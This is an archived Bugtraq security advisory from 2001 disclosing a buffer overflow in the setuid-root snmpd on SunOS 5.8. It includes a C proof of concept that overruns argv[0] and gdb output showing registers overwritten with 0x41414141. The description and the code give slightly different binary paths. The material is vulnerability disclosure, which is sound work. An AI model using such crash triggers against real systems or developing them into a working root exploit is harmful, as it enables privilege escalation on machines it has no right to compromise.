Bugtraq mailing list archives

Solaris 5.8 snmpd Vulnerability


From: Pablo Sor <psor () AFIP GOV AR>
Date: Tue, 13 Mar 2001 07:34:40 -0400

Description

The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root
and contains a buffer overflow: the problem occurs when it copies its own
name (argv[0]) into an internal variable without checking its length,
and this causes the overflow.

Vulnerable Version

Sun Solaris 5.8

Technical Description

-----------------------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Run snmpd with an argv[0] of the requested length, filled with 'A' (0x41). */
int main(int argc, char **argv)
{
    int len = (argc > 1) ? atoi(argv[1]) : 0;
    char *buf = (len > 0) ? malloc(len) : NULL;
    if (buf == NULL) {
        fprintf(stderr, "usage: %s <argv0-length>\n", argv[0]);
        return 1;
    }
    memset(buf, 0x41, len - 1);
    buf[len - 1] = 0;
    execl("/opt/SUNWssp/bin/snmpd", buf, (char *)0);
    perror("execl");      /* only reached if the exec fails */
    return 1;
}

-----------------------------------------------------

$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

$ ./snmpd-demo 700
Segmentation Fault (core dumped)

$ gdb ./snmpd-demo --core=core

[..]

Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0             0x0      0
g1             0x78000  491520
g2             0xff22579c       -14526564
g3             0xff162d78       -15323784
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x76f98  487320
o0             0x2c1    705
o1             0xffbed9b9       -4269639
o2             0x2c1    705
o3             0x41     65
o4             0xffbed180       -4271744
o5             0xff26a147       -14245561
sp             0xffbed658       -4270504
o7             0xfee83650       -18336176
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x0      0
l6             0x0      0
l7             0x0      0
i0             0x41414141       1094795585   ;;;;;
i1             0xffbed6fc       -4270340     ; pointer to argv[0]
i2             0x41414141       1094795585   ;;;;;
i3             0x41414141       1094795585   ;;;;;
i4             0x81010100       -2130640640
i5             0xff00   65280
fp             0xffbed698       -4270440
i7             0xff265474       -14265228
y              0x6      6
psr            0xfe001000       -33550336
wim            0x0      0
tbr            0x0      0
pc             0xfee32b58       -18666664
npc            0xfee32b5c       -18666660
fpsr           0x0      0
cpsr           0x0      0

(gdb) x/20x $i1
0xffbed6fc:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed70c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed71c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed72c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed73c:  0x41414141   0x41414141   0x41414141   0x41414141


Pablo Sor
psor () afip gov ar
